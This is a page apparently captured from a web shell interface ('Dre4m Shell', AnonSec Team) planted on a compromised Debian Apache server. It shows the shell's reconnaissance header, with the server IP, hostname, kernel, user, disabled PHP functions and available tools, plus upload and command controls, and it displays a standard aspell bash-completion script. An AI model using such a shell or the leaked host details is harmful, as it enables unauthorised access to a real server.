Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.220.110.239
Web Server : Apache/2.4.61 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /usr/share/bash-completion/completions/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/bash-completion/completions/aspell
# bash completion for aspell                               -*- shell-script -*-

_aspell_dictionary()
{
    local datadir aspell=${1:-aspell}
    datadir=$($aspell config data-dir 2>/dev/null || echo /usr/lib/aspell)
    # First, get aliases (dicts dump does not list them)
    COMPREPLY=($(printf '%s\n' $datadir/*.alias))
    COMPREPLY=("${COMPREPLY[@]%.alias}")
    COMPREPLY=("${COMPREPLY[@]#$datadir/}")
    # Then, add the canonical dicts
    COMPREPLY+=($($aspell dicts 2>/dev/null))
    COMPREPLY=($(compgen -X '\*' -W '${COMPREPLY[@]}' -- "$cur"))
}

_aspell()
{
    local cur prev words cword split
    _init_completion -s || return

    case $prev in
        -c | -p | check | --conf | --personal | --repl | --per-conf)
            _filedir
            return
            ;;
        --conf-dir | --data-dir | --dict-dir | --home-dir | --local-data-dir | --prefix)
            _filedir -d
            return
            ;;
        dump | create | merge)
            COMPREPLY=($(compgen -W 'master personal repl' -- "$cur"))
            return
            ;;
        --mode)
            COMPREPLY=($(compgen -W "$($1 modes 2>/dev/null |
                awk '{ print $1 }')" -- "$cur"))
            return
            ;;
        --sug-mode)
            COMPREPLY=($(compgen -W 'ultra fast normal bad-speller' \
                -- "$cur"))
            return
            ;;
        --keymapping)
            COMPREPLY=($(compgen -W 'aspell ispell' -- "$cur"))
            return
            ;;
        -d | --master)
            _aspell_dictionary "$1"
            return
            ;;
        --add-filter | --rem-filter)
            COMPREPLY=($(compgen -W "$($1 filters 2>/dev/null |
                awk '{ print $1 }')" -- "$cur"))
            return
            ;;
    esac

    $split && return

    if [[ $cur == -* ]]; then
        COMPREPLY=($(compgen -W '--conf= --conf-dir= --data-dir= --dict-dir=
            --encoding= --add-filter= --rem-filter= --mode= --add-extra-dicts=
            --rem-extra-dicts= --home-dir= --ignore= --ignore-accents
            --dont-ignore-accents --ignore-case --dont-ignore-case
            --ignore-repl --dont-ignore-repl --jargon --keyboard= --lang=
            --language-tag --local-data-dir= --master= --module
            --add-module-search-order --rem-module-search-order --per-conf=
            --personal= --prefix= --repl= --run-together --dont-run-together
            --run-together-limit= --run-together-min= --save-repl
            --dont-save-repl --set-prefix --dont-set-prefix --size= --spelling
            --strip-accents --dont-strip-accents --sug-mode=
            --add-word-list-path --rem-word-list-path --backup --dont-backup
            --reverse --dont-reverse --time --dont-time --keymapping=
            --add-email-quote= --rem-email-quote= --email-margin=
            --add-tex-command= --rem-tex-command= --tex-check-comments
            --dont-tex-check-comments --add-tex-extension --rem-tex-extension
            --add-sgml-check= --rem-sgml-check= --add-sgml-extension
            --rem-sgml-extension' -- "$cur"))
        [[ ${COMPREPLY-} == *= ]] && compopt -o nospace
    else
        COMPREPLY=($(compgen -W 'usage help check pipe list config soundslike
            filter version dump create merge' -- "$cur"))
    fi
} &&
    complete -F _aspell aspell

# ex: filetype=sh

Anon7 - 2022
AnonSec Team